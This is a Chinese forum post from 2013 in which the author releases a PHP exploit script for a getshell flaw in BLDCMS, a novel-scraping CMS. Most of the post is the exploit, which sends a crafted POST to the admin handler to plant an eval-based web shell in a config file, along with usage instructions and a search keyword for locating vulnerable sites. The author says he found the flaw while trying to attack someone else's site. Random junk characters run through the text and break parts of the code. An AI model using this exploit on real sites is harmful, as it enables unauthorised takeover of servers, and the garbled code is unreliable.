之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
7 H8 Z7 m6 O p; O6 E' o" h
% c+ P0 q$ |+ N- e * y2 J3 o8 ?1 X, \, f
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
) v! w# F2 j i- k. j0 p1 a: o! `& ^
% w1 T* e% b8 C/ h% ^既然都有人发了 我就把我之前写好的EXP放出来吧/ k* e9 o/ `$ F9 G
0 Q% Z1 r9 ?1 U! |+ G' R/ M% qview source print?01.php;">
5 |$ e2 }! y# e3 o& a4 \$ p7 _02.<!--?php
$ X- ?" y; H3 x. ^' ]6 N6 Y: }1 N. J03.echo "-------------------------------------------------------------------
' t9 B6 j2 i0 \04.
3 y+ K' I, Q( |$ H0 @. g05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
V8 N9 F, v0 V06. 0 `) ]( Y3 l) `& k
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun# P1 P- U5 T! B5 m
08. + E3 s- s8 @. R1 H! ?
09.QQ:981009941\r\n 2013.3.21\r\n + ~( J$ v$ D, K
10. 8 D y. t# H% G
11. 2 B1 G% Q( T0 _2 ]+ N8 ~
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
* a0 ] l3 J$ u6 T# X13. , s! R2 \0 w$ t4 F+ k
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 F7 W* S3 y! ?/ I3 X' i3 Y0 H3 M2 x, z15.
! \. g+ ?9 Y4 v+ E" y/ A16.--------------------------------------------------------------------\r\n";- V c7 ~ L3 t" j/ S
17.$url=$argv[1];
& Q5 _5 B" L# d& P18.$dir=$argv[2];
/ o1 M! U" I$ j1 r19.$pass=$argv[3];/ x( W' Z7 h. X/ t/ F
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
& K( B8 z% A K+ h21.if (emptyempty($pass)||emptyempty($url))
; }' q* y, n2 N( A& ^% [22.{exit("请输入参数");}
0 X! H/ e7 |' h) U23.else' i6 H% C9 u2 v7 G. D4 I
24.{3 c l- f: W/ y" p# x
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev3 F2 f W7 a9 r0 U
26. b' w; y1 H6 ~ | J/ k
27.al;/ z+ h# I4 y7 g) `1 K6 u* U# |
28.$length = strlen($fuckdata);* j# v+ i* }7 u. E* l
29.function getshell($url,$pass)
5 l: D g& n1 I- h/ R( u30.{& E' D: d9 z" t6 H9 s
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
+ h h- D' p0 H' C5 Q$ y7 z7 Q9 B32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";3 b( q9 Z- Z- c! p$ V
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";2 X) ?+ r; M: p9 i5 x/ E
34.$header .= "User-Agent: MSIE\r\n";
# _; a7 J( y+ |5 {35.$header .= "Host:".$url."\r\n";0 @# L3 Y$ |/ V2 P; N
36.$header .= "Content-Length: ".$length."\r\n";5 b) C) F$ d. ?& M
37.$header .= "Connection: Close\r\n";
2 ~7 n( O8 J0 w. C( ]38.$header .="\r\n";* N5 p$ @% ^2 @. A1 f- W
39.$header .= $fuckdata."\r\n\r\n";1 Z7 p {& B* j" C1 R' ~
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
6 v7 f% {1 G! g8 P41.if (!$fp)
3 Y B9 ~8 u# Y42.{% ]' T& {" d3 m- g: \4 v7 \
43.exit ("利用失败:请检查指定目标是否能正常打开");
7 L) B! ]& K7 ]. g) X4 A5 l' h; u8 x44.}
, O4 e! G/ _$ j8 G45.else{ if (!fputs($fp,$header)). T$ } S5 ~' J* ]) l0 f
46.{exit ("利用失败");}! Q' e3 ?6 b5 n
47.else7 |" N7 F1 ^% j( W- V1 Z' ^& B' y! d) ~
48.{: W0 d, N" R! U4 V- y ~: I
49.$receive = '';
3 J. f: h/ [% L, F/ q50.while (!feof($fp)) {
4 }: i+ j: v2 B* m& g3 m Q51.$receive .= @fgets($fp, 1000);' u; L# y5 H) T' I( F! Z; @
52.}% _2 L! r# ]: F) l, X
53.@fclose($fp);
4 `& r- D1 k7 Z+ k54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
4 g! U* ~: }" G* K55.
9 K# g0 c% h/ ^56.GPC是否=off)";* j; z0 \0 @. k& _
57.}}
9 A. z. Q1 ]( [/ {" i( A58.}
4 h+ c7 N6 R* h% R1 c6 W3 Y59.}
F9 w- e) J5 c3 I3 j60.getshell($url,$pass);3 L8 w+ j; m/ Y! R3 z0 f
61.?-->+ B4 _% v1 `' r0 y( Y9 d
( i% S) o4 d# m T. f3 m7 O v0 P5 R5 P1 K' N
9 ?7 S: ^# u4 }9 [9 o
by 数据流
( f) K8 p$ s+ |6 w. g |
发表于 2013-3-26 20:49:10
收藏
支持
反对